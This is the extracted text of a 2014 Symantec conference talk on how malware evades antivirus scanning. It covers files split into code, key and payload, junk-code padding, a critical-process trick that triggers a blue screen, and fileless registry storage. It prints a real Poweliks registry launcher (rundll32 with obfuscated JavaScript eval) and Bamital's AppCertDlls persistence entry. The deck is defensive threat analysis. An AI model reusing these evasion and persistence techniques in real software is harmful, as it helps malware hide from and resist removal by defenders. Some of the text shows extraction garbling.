code blue 2014 : how to avoid the detection by malware by hiroshi sninotsuka

How malware avoid An/ Virus scanning

Hiroshi Shinotsuka Threat Analysis Engineer

Self-‐introduc/on

Copyright © 2014 Symantec Corpora;on 2

•  Threat analysis engineer in Symantec. •  Analyze suspicious file and create An;-‐Virus signature •  Provide detailed technical descrip;on to customers on demand

•  Publically provide malware-‐related informa;on


24 hours x 365 days

ABacker’s techniques to avoid detec/ng

1 Store decryp;on key and data in separate files

2 Large amount of junk code

3 Process protec;on

4 Store malicious code outside of files (fileless malware)


Trojan.Blueso detec/on


0

5,000

10,000

15,000

20,000

25,000

30,000

35,000

Trojan.Blueso

August

September

October

November

Trojan.Blueso file structure


RAR self-‐extrac/ng file 13 MB

AutoIt executable file

Decryp;on code script file

Decryp;on key configura;on file

Encrypted code

AutoIt is a programing language for MicrosoW Windows plaYorm. The AutoIt syntax is very similar to that of BASIC programing language and is designed to automate the Windows GUI.

RAR self-‐extrac;ng file drops 4 files, then it execute AutoIt script

Decrypted code

Bluso inject Backdoor.Trojan


Code

Decryp;on key

Encrypted code

Legi;mate Windows Process

Decryp;on

Part of Decrypted

code

Internet Explorer Process

Decrypted code

AutoIt executable

Watch Dog monitor


File deleted

Process deleted Create Process

Inject

Create File

Trojan.Blueso make file/registry/process again if An;virus delete it.




3 Process protec;on



Tradi/onal sample


Packer / Self update

•  Harder to detect encrypted files. •  Tradi;onal sample stored all informa;on in single file.

Code

Decryp;on key

Encrypted code

Code

Decrypted malicious code

New technique to avoid detec/on


Tradi;onally malware saved decrypted image to a file and executed. An;virus scanner detects malware when malware saved it decrypted image onto the disk.

New technique is to inject decrypted image to a new running process and executes in order to avoid detec;on by file scan.

Decrypted malicious code

Legi;mate Windows Process Decrypt in memory

Decrypted malicious code Code

Decryp;on key

Encrypted code

AutoIt executable

File detail


Code

Decryp;on key

Encrypted code

An;Virus scanner scans each file.

Why aBacker split malware into four separate files


AutoIt executable

Decryp;on code

Decryp;on key Seeng file

Encrypted code

Scan

Scan

Scan

Scan

What does this mean?

•  Hiding malicious code by encryp;ng

•  Store code, decryp;on key, encrypted code in separate files.

•  An;virus scanner can’t determine ‘encrypted code’ as malicious file.

•  An;virus scanner can’t detect the file without understanding rela;onships between mul;ple files.





3 Process protec;on



Code(Beginning of file)


I TAB character is replaced with 1 byte string

You only see junk comment lines !

Code (Sample 1)


Code (Sample 2)


Code


Finally, at line 23670, 16MB in size, important code is reached. 87476 lines of AutoIt script codes. Only 900 lines without comment lines. Only 1% important codes.

An/virus scan method


•  An;virus scanner needs to have balance between detec;on and performance

•  An;virus scanner first determines file types and starts file scan based on the detected file type.

Executable file

ZIP file

JPEG file

No special file structure in text file/script file.


Script files have no file-‐header, which means the files have no special file structure.

An;virus scanner needs to run a par;al scan and determine what the file is.

Very difficult to keep scan performance if malicious script has so many comment/junk code.




3 Process protec;on



How does Blueso start and protect itself?


Code

Decryp;on key

Encrypted code

Legi;mate Windows Process

Decryp;on

Internet Explorer process

Malware !! Malware ??

What is wrong ??

AutoIt executable

Process protec/on mechanism


1)  Terminate Internet Explorer -‐> Malicious code injected into Legi;mate Windows Process is executed again

2)  Terminate Legi;mate Windows Process -‐> Running script on AutoIt execute again

3)  Terminate AutoIt ? -‐> Handle AutoIt executable as an essen;al process for Windows system by using undocumented API NtSetInforma;onProcess

As soon as AutoIT is terminated, Windows determines it as unrecoverable cri;cal problem.

-‐> Blue Screen Of Death !!

Blue Screen Of Death





3 Process protec;on



Example of malware store code/data in irregular place(Bamital)


Set registry entry to start a code when windows restarts.

HKEY_LOCAL_MACHINE\system\CurrentControlSet\Control\Session Manager\AppCertDlls\"AppSecDll" = "%USER_Profile%\Local Seengs\Applica;on Data\Windows Server\xblscp.dll“

Because of analysis already performed, xblscp.dll is determined as a malicious file.

Stricktly speaking, does this file have malicious code in it?

Example of malware store code/data in irregular place (Bamital)2


How it works

•  Allocate memory •  Store data from registry to the allocated memory •  Call the allocated memory

An;virus scanner doe not know data rule. The data is wriven in registry. Another malware uses same technique by file.

Example of malware store code/data in irregular place(Poweliks)


Trojan.Poweliks writes a Windows Powershell script to registry.

You can find this registry entry may execute encrypted java script.

Encrypted code that should be decrypted in different registry entry.

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-‐5D93-‐4B2E-‐BBB0-‐99B7938DA9E4}\LocalServer32\(Default) =

rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplica;on \";eval(\"epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/S~S�e)(ILDS]]dmtje]]|84f81:�.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmYswfs43]]b(*,(=0tdsjqu?(*\".replace(/./g,func;on(_){return%20String.fromCharCode(_.charCodeAt()-‐1);}))

"a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@

Conclusion


•  Avackers discover new techniques every day.

•  Avackers employ techniques to make malware removal difficult •  File based scanning is no longer effec;ve •  Mul;-‐layered security is becoming more important

& Q A


Thank you!

Copyright © 2014 Symantec Corpora/on. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corpora;on or its affiliates in the U.S. and other countries. Other names may be trademarks of their respec;ve owners.

This document is provided for informa;onal purposes only and is not intended as adver;sing. All warran;es rela;ng to the informa;on in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The informa;on in this document is subject to change without no;ce.

Hiroshi Shinotsuka

code blue 2014 : how to avoid the detection by malware by hiroshi sninotsuka

Technology

pted code autoitexecutable

createfile trojan

thenitexecuteautoit

codesample1 copyright2014syma